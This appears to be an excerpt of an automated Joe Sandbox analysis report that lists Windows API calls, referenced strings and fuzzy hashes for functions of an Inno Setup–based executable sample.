                                                                                            • Opcode Fuzzy Hash: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                            • Instruction Fuzzy Hash: 8A512F70A002099FDF11DFA9C881AEEBBF9FF49704F104066F504A7791D7799981CBA9
                                                                                            APIs
                                                                                            • GetFocus.USER32 ref: 0041BA17
                                                                                            • GetDC.USER32(?), ref: 0041BA23
                                                                                            • SelectPalette.GDI32(00000000,?,00000000), ref: 0041BA5D
                                                                                            • RealizePalette.GDI32(00000000), ref: 0041BA69
                                                                                            • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BA8D
                                                                                            • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041BAC1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                            • String ID: %H
                                                                                            • API String ID: 3275473261-1959103961
                                                                                            • Opcode ID: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                            • Instruction ID: 3fcaffe560058c7771eaec6053d79e0e1924f360d52694d27862de55114c0f48
                                                                                            • Opcode Fuzzy Hash: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                            • Instruction Fuzzy Hash: 9D512A74A002189FDB11DFA9C891AAEBBF9FF49700F154066F904EB751D738AD40CBA4
                                                                                            APIs
                                                                                              • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                              • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 00496585
                                                                                            • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00496599
                                                                                            • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 004965B3
                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965BF
                                                                                            • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965C5
                                                                                            • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965D8
                                                                                            Strings
                                                                                            • Deleting Uninstall data files., xrefs: 004964FB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                            • String ID: Deleting Uninstall data files.
                                                                                            • API String ID: 1570157960-2568741658
                                                                                            • Opcode ID: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                            • Instruction ID: caddedc05ae4add9971b90b84c259ce0cd5246952d50e779d54ebc968ffbf915
                                                                                            • Opcode Fuzzy Hash: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                            • Instruction Fuzzy Hash: 73216170204250BFEB10EB6ABC82B2637A8DB54728F53453BB501961D6DA7CAC448A6D
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9,?,?,?,?,00000000), ref: 00470263
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9), ref: 0047027A
                                                                                            • AddFontResourceA.GDI32(00000000), ref: 00470297
                                                                                            • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004702AB
                                                                                            Strings
                                                                                            • Failed to set value in Fonts registry key., xrefs: 0047026C
                                                                                            • Failed to open Fonts registry key., xrefs: 00470281
                                                                                            • AddFontResource, xrefs: 004702B5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                            • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                            • API String ID: 955540645-649663873
                                                                                            • Opcode ID: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                            • Instruction ID: 122e39bb1ea2b43e4c2a7da55aa69ddad999e5e54c07bca5f4119535fc7344d3
                                                                                            • Opcode Fuzzy Hash: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                            • Instruction Fuzzy Hash: 6921E271741204BBDB10EAA68C46FAE67AC9B14704F208477B904EB3C3DA7C9E01866D
                                                                                            APIs
                                                                                              • Part of subcall function 00416410: GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                              • Part of subcall function 00416410: UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                              • Part of subcall function 00416410: RegisterClassA.USER32(?), ref: 004164CE
                                                                                            • GetVersion.KERNEL32 ref: 00462E60
                                                                                            • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462E9E
                                                                                            • SHGetFileInfo.SHELL32(00462F3C,00000000,?,00000160,00004011), ref: 00462EBB
                                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 00462ED9
                                                                                            • SetCursor.USER32(00000000,00000000,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462EDF
                                                                                            • SetCursor.USER32(?,00462F1F,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462F12
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                            • String ID: Explorer
                                                                                            • API String ID: 2594429197-512347832
                                                                                            • Opcode ID: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                            • Instruction ID: b0f6820fd5a5ea072646c086af9eca81c98a3cd1ffd9b7ca0f87214cf94a4ba1
                                                                                            • Opcode Fuzzy Hash: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                            • Instruction Fuzzy Hash: CD21E7307403047AEB15BB759D47B9A3798DB09708F4004BFFA05EA1C3EEBD9901966D
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02112BDC,?,?,?,02112BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BDC,?,?,?,02112BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                            • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BDC,?,?,?,02112BDC), ref: 004783CC
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,02112BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                                            • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                            • API String ID: 2704155762-2318956294
                                                                                            • Opcode ID: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                                                            • Instruction ID: 2a72e966618face2f1bd82d2a524167157479a72732682c44667b4342ad9b4bf
                                                                                            • Opcode Fuzzy Hash: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                                                            • Instruction Fuzzy Hash: 370180A07C070536E520316A4C8AFBB654C8B50769F14863FBA1DFA2D3FDED9D06016E
                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                                            • LocalFree.KERNEL32(0058E568,00000000,00401B68), ref: 00401ACF
                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,0058E568,00000000,00401B68), ref: 00401AEE
                                                                                            • LocalFree.KERNEL32(0058F568,?,00000000,00008000,0058E568,00000000,00401B68), ref: 00401B2D
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                                            • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                                            Similarity
                                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                            • String ID: hX
                                                                                            • API String ID: 3782394904-463809249
                                                                                            • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                            • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                                            • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                            • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,00459F8E,?,00000000,00000000,00000000,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 00459ED2
                                                                                              • Part of subcall function 004543F4: FindClose.KERNEL32(000000FF,004544EA), ref: 004544D9
                                                                                            Strings
                                                                                            • Failed to delete directory (%d). Will retry later., xrefs: 00459EEB
                                                                                            • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459F47
                                                                                            • Deleting directory: %s, xrefs: 00459E5B
                                                                                            • Stripped read-only attribute., xrefs: 00459E94
                                                                                            • Failed to delete directory (%d)., xrefs: 00459F68
                                                                                            • Failed to strip read-only attribute., xrefs: 00459EA0
                                                                                            • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459EAC
                                                                                            Similarity
                                                                                            • API ID: CloseErrorFindLast
                                                                                            • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                            • API String ID: 754982922-1448842058
                                                                                            • Opcode ID: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                                                            • Instruction ID: b8d9b7298ea7c3337bda5d500217c07e27fbd6b384233f4239b27a523d6d10d0
                                                                                            • Opcode Fuzzy Hash: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                                                            • Instruction Fuzzy Hash: 1841A331A04208CACB10EB69C8413AEB6A55F4530AF54897BAC01D73D3CB7C8E0DC75E
                                                                                            APIs
                                                                                            • GetCapture.USER32 ref: 00422EA4
                                                                                            • GetCapture.USER32 ref: 00422EB3
                                                                                            • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB9
                                                                                            • ReleaseCapture.USER32 ref: 00422EBE
                                                                                            • GetActiveWindow.USER32 ref: 00422ECD
                                                                                            • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F4C
                                                                                            • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FB0
                                                                                            • GetActiveWindow.USER32 ref: 00422FBF
                                                                                            Similarity
                                                                                            • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                            • String ID:
                                                                                            • API String ID: 862346643-0
                                                                                            • Opcode ID: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                            • Instruction ID: c6261992695b47722d84ffa44129b55dc5b2a4dad2f70b0012283783c1c7b094
                                                                                            • Opcode Fuzzy Hash: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                            • Instruction Fuzzy Hash: 24417230B00245AFDB10EB69DA86B9E77F1EF44304F5540BAF404AB2A2D778AE40DB49
                                                                                            APIs
                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 0042F2BA
                                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 0042F2D1
                                                                                            • GetActiveWindow.USER32 ref: 0042F2DA
                                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F307
                                                                                            • SetActiveWindow.USER32(?,0042F437,00000000,?), ref: 0042F328
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveLong$Message
                                                                                            • String ID:
                                                                                            • API String ID: 2785966331-0
                                                                                            • Opcode ID: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                            • Instruction ID: ac844ef734d24c76dc9aa96f201b13a865b129e9c1b137beabd8cb6517960092
                                                                                            • Opcode Fuzzy Hash: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                            • Instruction Fuzzy Hash: F931D271A00254AFEB01EFA5DD52E6EBBB8EB09304F9144BAF804E3291D73C9D10CB58
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 0042948A
                                                                                            • GetTextMetricsA.GDI32(00000000), ref: 00429493
                                                                                              • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004294A2
                                                                                            • GetTextMetricsA.GDI32(00000000,?), ref: 004294AF
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004294B6
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 004294BE
                                                                                            • GetSystemMetrics.USER32(00000006), ref: 004294E3
                                                                                            • GetSystemMetrics.USER32(00000006), ref: 004294FD
                                                                                            Similarity
                                                                                            • API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
                                                                                            • String ID:
                                                                                            • API String ID: 1583807278-0
                                                                                            • Opcode ID: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                                                            • Instruction ID: 8a5b62ad3b2811282b00f4aa11bc4c2c065e9b9ae855548013837f5c18493421
                                                                                            • Opcode Fuzzy Hash: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                                                            • Instruction Fuzzy Hash: 0F01C4A17087103BE321767A9CC6F6F65C8DB44358F84043BF686D63D3D96C9C41866A
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 0041DE27
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041DE31
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041DE3E
                                                                                            • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE4D
                                                                                            • GetStockObject.GDI32(00000007), ref: 0041DE5B
                                                                                            • GetStockObject.GDI32(00000005), ref: 0041DE67
                                                                                            • GetStockObject.GDI32(0000000D), ref: 0041DE73
                                                                                            • LoadIconA.USER32(00000000,00007F00), ref: 0041DE84
                                                                                            Similarity
                                                                                            • API ID: ObjectStock$CapsDeviceIconLoadRelease
                                                                                            • String ID:
                                                                                            • API String ID: 225703358-0
                                                                                            • Opcode ID: 93123cf7b7da28845296a778695a34f9ae7968dfa7e72d2685fd09fde09bf652
                                                                                            • Instruction ID: 282f56568f1177e4dad385ec7f61a974d29090d827cf1f87eb40c920fa9ca7e8
                                                                                            • Opcode Fuzzy Hash: 93123cf7b7da28845296a778695a34f9ae7968dfa7e72d2685fd09fde09bf652
                                                                                            • Instruction Fuzzy Hash: 4C1142706457015EE340BFA66E52B6A36A4D725708F40413FF609AF3D1D77A2C448B9E
                                                                                            APIs
                                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 00463344
                                                                                            • SetCursor.USER32(00000000,00000000,00007F02,00000000,004633D9), ref: 0046334A
                                                                                            • SetCursor.USER32(?,004633C1,00007F02,00000000,004633D9), ref: 004633B4
                                                                                            Similarity
                                                                                            • API ID: Cursor$Load
                                                                                            • String ID: $ $Internal error: Item already expanding
                                                                                            • API String ID: 1675784387-1948079669
                                                                                            • Opcode ID: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                                                            • Instruction ID: e4e85f4aa3fa623d7d3a169fbc538aa22306e9421cedfdc69a3031d12d347dae
                                                                                            • Opcode Fuzzy Hash: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                                                            • Instruction Fuzzy Hash: 4CB18270604284EFDB11DF29C545B9ABBF1BF04305F1484AAE8469B792DB78EE44CB4A
                                                                                            APIs
                                                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                            Similarity
                                                                                            • API ID: PrivateProfileStringWrite
                                                                                            • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                            • API String ID: 390214022-3304407042
                                                                                            • Opcode ID: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                                                            • Instruction ID: 4c4b1d7f09994941c57eaafc4db68242d6a3f6c21ecd3f2b5b8f846a746055a2
                                                                                            • Opcode Fuzzy Hash: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                                                            • Instruction Fuzzy Hash: 40911434E002099BDB01EFA5D842BDEB7F5AF4874AF608466E90077392D7786E49CB58
                                                                                            APIs
                                                                                            • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476CA9
                                                                                            • SetWindowLongW.USER32(00000000,000000FC,00476C04), ref: 00476CD0
                                                                                            • GetACP.KERNEL32(00000000,00476EE8,?,00000000,00476F12), ref: 00476D0D
                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476D53
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassInfoLongMessageSendWindow
                                                                                            • String ID: COMBOBOX$Inno Setup: Language
                                                                                            • API String ID: 3391662889-4234151509
                                                                                            • Opcode ID: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                                                            • Instruction ID: b13fa11fcbd9abdf7db93726dac51e4442bd67f198c8610d2c1064f44be53319
                                                                                            • Opcode Fuzzy Hash: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                                                            • Instruction Fuzzy Hash: 46812C346006059FDB10DF69D985AEAB7F2FB09304F15C1BAE808EB762D778AD41CB58
                                                                                            APIs
                                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,00408968,?,?,?,?,00000000,00000000,00000000,?,0040996F,00000000,00409982), ref: 0040873A
                                                                                              • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                              • Part of subcall function 004085B4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087B6,?,?,?,00000000,00408968), ref: 004085C7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLocale$DefaultSystem
                                                                                            • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                            • API String ID: 1044490935-665933166
                                                                                            • Opcode ID: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                                            • Instruction ID: 5c6fde8006682913ecab3173e7335377554a92ac61a87523d81808753b4ec1a9
                                                                                            • Opcode Fuzzy Hash: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                                            • Instruction Fuzzy Hash: 7D516C24B00108ABDB01FBA69E4169EB7A9DB94308F50C07FA181BB3C3CE3DDA05975D
                                                                                            APIs
                                                                                            • GetVersion.KERNEL32(00000000,004118F9), ref: 0041178C
                                                                                            • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041184A
                                                                                              • Part of subcall function 00411AAC: CreatePopupMenu.USER32 ref: 00411AC6
                                                                                            • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118D6
                                                                                              • Part of subcall function 00411AAC: CreateMenu.USER32 ref: 00411AD0
                                                                                            • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118BD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                            • String ID: ,$?
                                                                                            • API String ID: 2359071979-2308483597
                                                                                            • Opcode ID: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                                                            • Instruction ID: ecf66c9774bccec907b621c371347452b74b7622051e058d8a4a73451c3e974f
                                                                                            • Opcode Fuzzy Hash: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                                                            • Instruction Fuzzy Hash: D7510674A00245ABDB10EF6ADC816EA7BF9AF09304B11857BF904E73A6D738DD41CB58
                                                                                            APIs
                                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 0041BF28
                                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 0041BF37
                                                                                            • GetBitmapBits.GDI32(?,?,?), ref: 0041BF88
                                                                                            • GetBitmapBits.GDI32(?,?,?), ref: 0041BF96
                                                                                            • DeleteObject.GDI32(?), ref: 0041BF9F
                                                                                            • DeleteObject.GDI32(?), ref: 0041BFA8
                                                                                            • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFC5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                            • String ID:
                                                                                            • API String ID: 1030595962-0
                                                                                            • Opcode ID: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                                            • Instruction ID: 74cae3b7aa7aab4ce12a2fbd062d204c5c4082198076ec6df892ad84fd278e80
                                                                                            • Opcode Fuzzy Hash: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                                            • Instruction Fuzzy Hash: 6A510671A002199FCB10DFA9C9819EEB7F9EF48314B11416AF914E7395D738AD41CB68
                                                                                            APIs
                                                                                            • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEFE
